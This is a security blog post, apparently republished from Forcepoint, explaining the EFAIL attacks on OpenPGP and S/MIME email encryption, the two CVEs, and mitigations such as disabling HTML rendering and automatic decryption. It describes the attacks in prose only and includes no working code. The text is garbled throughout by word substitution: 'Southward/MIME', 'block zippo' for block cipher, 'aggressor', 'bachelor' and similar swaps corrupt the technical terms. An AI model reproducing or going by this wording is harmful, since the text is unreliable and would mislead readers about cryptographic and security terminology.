The EFAIL OpenPGP & S/MIME vulnerabilities

Those who follow the security news could hardly accept missed the release of the ‘EFAIL’ vulnerabilities this week. In brief, issues have been plant with OpenPGP and Southward/MIME email encryption which tin potentially betrayal the decrypted text of a message to attackers.

What are PGP and Due south/MIME?

The authors of the EFAIL paper embrace this well, but ultimately email is a plaintext communication medium – much like the bulk of pen and paper letters outside of spy films – and PGP and S/MIME are methods of encrypting the content of these messages.

It should be noted at this point that PGP and South/MIME serve a dissimilar purpose to TLS. The latter is a method of securing data in transit: when the email arrives on the recipient’s machine it is no longer encrypted. PGP and S/MIME, on the other paw, secure the data at rest (and, as a by-production, provide an additional layer of security in transit). This is particularly desirable for anyone who is concerned about the security of their communications should, for example, their laptop be stolen – S/MIME is often used in enterprises for this very reason.

The EFAIL vulnerabilities

The full details of EFAIL are naturally provided past the authors, simply the two variants both look at ‘tricking’ an e-mail client into revealing the decrypted text of a bulletin.

Separate CVE numbers have been assigned for the gadget attacks against OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689).

Direct exfiltration

The kickoff vulnerability involves wrapping the encrypted text in a malformed HTML image tag. Afterwards the email client has decrypted the email, the blob of decrypted content sits inside the source URL section of the tag, resulting in the client making a asking to a domain containing the entire decrypted text – assuming the aggressor controls the server receiving the request, they now take the full message (or at to the lowest degree the important bit) in obviously text.

While this variant affects the popular Apple Mail and Mozilla Thunderbird clients, the proficient news is that it is theoretically fixable past patching the email clients.

CBC/CFB gadget assail

The second variant is rather more technical and effectively relies on the combination of the known format of Due south/MIME emails in particular with block zippo techniques although again, at the cease of the day, the goal once more is to insert a malformed tag to fox the client into making an HTTP request containing the plain text of the message.

This variant is reportedly more than constructive against S/MIME than PGP encryption, but unfortunately should work against whatsoever standard-compliant email customer.

Protection & mitigation

It is worth noting that in both cases someone needs to intercept your email to bear out the attack. This significantly reduces the likelihood of EFAIL becoming widespread, although for ‘high value’ targets such as politicians, journalists, etc. the risk is yet serious.
Naturally, we recommend applying any vendor patches which may be released to counter these vulnerabilities every bit soon as they go bachelor. In the meantime, there are steps that can be taken to endeavor to minimise chance:

Disable HTML E-mail
– Oftentimes recommended past the security industry, disabling the rendering of HTML email will prevent your email customer from parsing image links (among other things). While this doesn’t guarantee safe, it removes many potential avenues of attack within e-mail content. Note that this is specifically disabling the viewing of HTML e-mail which you have received, as opposed to merely changing the default format in which yous write and transport letters.

Disable automatic decryption in your email client
– Note that this does not mean stopping the employ of PGP or Southward/MIME. It simply means that your email customer no longer handles the decryption for yous. The EFF provide details on how to take this stride in Thunderbird, Apple tree Mail service, and iOS Mail.

As ever, Forcepoint Security Labs volition go along to monitor for new developments and attacks in the wild.

Luke Somerville

Head of Special Investigations

Luke is responsible for supporting the business with in-depth technical analysis of major incidents such equally the WannaCry and Petya outbreaks, and for overseeing longer-term research projects to place and runway new and advanced threats and set on methods. The enquiry from Luke and his team…

Read more articles by Luke Somerville

Source: https://www.forcepoint.com/blog/x-labs/efail-openpgp-smime-vulnerabilities

Check Also

Will Dogecoin Go Up In Value

Will Dogecoin Go Up In Value

On Dec. 6, 2013, Billy Markus and Jackson Palmer decided to combine their dearest of …